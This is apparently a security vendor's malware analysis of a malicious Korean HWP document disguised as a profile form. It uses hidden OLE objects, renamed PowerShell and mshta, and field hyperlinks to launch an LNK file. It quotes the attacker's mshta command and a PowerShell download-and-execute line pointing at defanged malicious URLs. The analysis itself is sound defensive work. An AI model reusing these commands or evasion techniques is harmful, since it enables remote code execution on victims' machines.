The ASEC analysis team has recently identified a malicious HWP file that exploits OLE objects and flash vulnerabilities. The file uses a malicious URL identified in 2020. This URL contains a flash vulnerability (CVE-2018-15982) file, which requires users to take caution.
The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened. The created files are shown below. The HWP file does not directly use previously known files such as powershell.exe and mshta.exe, copying files in the %TEMP% path instead. This is likely done to bypass behavior detection features.
|hword.exe||Normal PowerShell program|
|hwp.exe||Normal mshta program|
|hwp.lnk||Malicious link file|
|1234dd.tmp||Additional malicious HWP file|
The attacker placed a white rectangular image in a position where the object is inserted to hide the OLE objects. Among OLE objects inserted into the document, hword.exe and hwp.exe are normal files that can be run in the Windows 10 environment.
Figure 1. OLE objects inserted into the document
Judging by the content of the document, it appears that this document was distributed with a title such as ‘profile form’, similar to past cases. The attacker put blank space and hyperlink in each slot to execute the created malicious files.
Thus, when users click each field to fill out the form, they are connected to the embedded hyperlinks, which run ..\appdata\local\temp\hwp.lnk. Since the link is in a relative path, the HWP file needs to be in a certain location for malicious behaviors to be performed.
The link file that is run when the hyperlink is clicked contains the following command, so it ultimately accesses a malicious URL using mshta.
- %tmp%\hwp.exe “hxxp://yukkimmo.sportsontheweb[.]net/hw.php”
As of right now, the URL above contains a command to close hwp.exe as shown below. However, various malicious commands can be executed depending on the attacker’s intent.
Aside from the command that closes hwp.exe, an additional command which is thought to be transmitted from the URL was detected in AhnLab’s infrastructure. This is a command that uses PowerShell with the filename ‘hword.exe’ and accesses hxxp://yukkimmo.sportsontheweb[.]net/h.txt, the URL containing a malicious script code.
- hword.exe -nop -c \”iex(new-object net.webclient).downloadstring(‘hxxp://yukkimmo.sportsontheweb[.]net/h.txt’)
The script performs the following features:
1. Downloading and running additional PE data
The code downloads additional PE data from hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt and saves it in the %temp% folder as ‘2247529.txt’. This data is executed by using the process hollowing technique on System32\cmd.exe.
When the PE data is executed, it saves the filename that includes ‘.hwp.lnk’ in the Recent folder in %appdata%\12312.txt.
2. Changing the HWP file into the previously generated 1234dd.tmp file
The ‘1234dd.tmp’ file generated when the HWP file is executed is copied under the name ‘3dd21.tmp’. Afterward, the path of the HWP file created in %appdata%\12312.txt is checked, and the file is changed to the copied 3dd21.tmp file. As such, when users open the HWP file again, the HWP file (1234dd.tmp) with an embedded flash object is opened instead of the HWP file described above. The modified HWP file’s content and file properties are similar to that of the HWP file mentioned earlier.
The changed HWP file (1234dd.tmp) contains a flash object. Checking the object properties will show that it has a certain URL embedded in it.
The confirmed URL is hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php and have been identified in 2020. This URL contains the flash vulnerability (CVE-2018-15982) file.
Below is an additionally identified HWP file. The file in question was disguised as a personal data collection form for the payment of service fees and includes internally embedded OLE objects. Aside from 1234dd.tmp (HWP file), the files generated when the HWP file is executed are all identical to the files explained above.
This file also has hyperlinks embedded in every field except for the contact field. When users click each field, it executes ..\appdata\local\temp\hwp.lnk. The LNK file runs the command “hxxp://yukkimmo.sportsontheweb[.]net/hw.php”. Its behaviors and the URL it accesses are the same as the previously mentioned file. The only difference is that there is no flash object embedded in the additionally created ‘1234dd.tmp’ file.
As cases exploiting previously known vulnerabilities are recently being discovered, users need to take caution. Furthermore, because this malware receives additional commands from the attacker and executes said commands, various malicious behaviors can be performed. Users must refrain from opening document files from unknown sources and update their applications and V3 to the latest version.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.